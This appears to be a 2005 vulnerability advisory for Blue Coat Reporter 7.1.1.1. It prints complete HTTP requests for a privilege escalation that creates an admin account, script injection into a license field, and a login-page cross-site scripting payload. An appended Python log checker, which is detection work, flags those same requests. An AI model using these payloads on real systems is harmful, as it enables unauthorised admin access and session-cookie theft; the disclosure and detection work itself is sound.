
| Subject: | Blue Coat Reporter multiple remote vulnerabilities |
|---|---|
| Date: | Tue, 24 May 2005 10:29:13 +0200 (MEST) |
Blue Coat Reporter 7.1.1.1 - multiple remote vulnerabilities
============================================================
Blue Coat Reporter
==================
"Blue Coat Reporter 7 provides identity-based reporting on Web
communications enabling enterprises to evaluate Web policies and manage
network resources more effectively."
Product/Version
===============
Blue Coat Reporter 7.1.1.1
Running on Win32
Vulnerabilities
===============
a) Privilege escalation
A user without administrative privileges is able to create a user account
with administrative privileges.
b) HTML-Code Injection
Unauthenticated users can inject HTML code into the application. The
code is executed when an authenticated user views the affected
web page.
c) Cross Site Scripting at login page
Supplying script code instead of a valid username at the login page
results in cross-site scripting.
Exploiting
==========
a) Privilege escalation
1) Create a non-priv user (user: test, pass: test)
2) Log in with the non-administrative user account
3) Send the following request to create a user hurz with password hurz and
admin privileges.
POST /?dp+templates.admin.users.user_form_processing HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
Referer:
http://192.168.142.133:8987/?dp+templates.admin.users.user_form+volatile.form_type+new
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.142.133:8987
Pragma: no-cache
Cookie: session_id=d9430f0d59eb43871e2c38ab84627232; authusername7=test;
authpassword7=098f6bcd4621d373cade4e832627b4f6
Content-Length: 170
submit=Save+and+Close&volatile.user.username=hurz&volatile.user.password=hurz&volatile.user.administrator=true&volatile.user.profiles.0=profile1&volatile.form_type=new
b) HTML-Code Injection
POST
/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true
HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
Referer:
http://192.168.142.133:8987/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 192.168.142.133:8987
Pragma: no-cache
Cookie: session_id=invalid; authusername7=invalid; authpassword7=invalid
Content-Length: 100
volatile.add_license=&volatile.license_to_add=<script>alert(document.cookie)</script>
c) Cross Site Scripting at login page
Supply the following username at the login page:
"/><script>alert("BlueGoat")</script>
Vendor
======
Blue Coat responded to my message very fast and in a very professional
way. Exemplary!
Homepage: http://www.bluecoat.com
Advisory:
http://www.bluecoat.com/support/knowledge/advisory_reporter_711_vulnerabilities.html
Discovered
==========
19.05.2005 by Oliver Karow
http://www.oliverkarow.de/research/bluecoat.htm
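For reviewing Reporter web logs for issues a) and b) above, the following check is added here as an example and is not part of the original advisory. The page names, form fields and cookie name are those shown in the advisory's requests; the log-entry layout (a dict with method, query, cookie and body), the admin name "admin" and the sample entries are assumptions.

```python
from urllib.parse import parse_qs

# Page and field names come from the advisory's requests; the log layout is assumed.
USER_FORM = "templates.admin.users.user_form_processing"
LICENSE_VIEW = "templates.admin.authentication.licensing_view"

def cookie_value(cookie_header, name):
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return None

def review_request(req, admins):
    """Return findings for one logged request (dict: method, query, cookie, body)."""
    if req["method"] != "POST":
        return []
    findings, pages = [], req["query"].split("+")
    form = parse_qs(req["body"], keep_blank_values=True)  # also URL-decodes values
    user = cookie_value(req["cookie"], "authusername7")
    if USER_FORM in pages:
        wants_admin = form.get("volatile.user.administrator", [""])[0].lower() == "true"
        if wants_admin and user not in admins:
            new_user = form.get("volatile.user.username", ["?"])[0]
            findings.append(f"admin account {new_user!r} requested by non-admin {user!r}")
    if LICENSE_VIEW in pages:
        value = form.get("volatile.license_to_add", [""])[0]
        if any(ch in value for ch in '<>"'):
            findings.append(f"markup characters in license field: {value!r}")
    return findings

# Constructed sample entries (not captured traffic); "admin" is an assumed admin name.
SAMPLE_LOG = [
    {"method": "POST", "query": "/?dp+" + USER_FORM,
     "cookie": "session_id=aaaa; authusername7=test; authpassword7=bbbb",
     "body": "volatile.user.username=hurz&volatile.user.administrator=true"},
    {"method": "POST", "query": "/?dp+" + USER_FORM,
     "cookie": "session_id=cccc; authusername7=admin; authpassword7=dddd",
     "body": "volatile.user.username=alice&volatile.user.administrator=true"},
    {"method": "POST", "query": "/?dp+" + LICENSE_VIEW + "+volatile.admin_gui+true",
     "cookie": "session_id=invalid; authusername7=invalid; authpassword7=invalid",
     "body": "volatile.add_license=&volatile.license_to_add=%3Cb%3Ex%3C%2Fb%3E"},
]

def scan(log, admins):
    return [(i, f) for i, req in enumerate(log) for f in review_request(req, admins)]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG, {"admin"}), sep="\n")
```

The user name is read from the authusername7 cookie as the client sent it, so it identifies the session to investigate rather than proving who made the request.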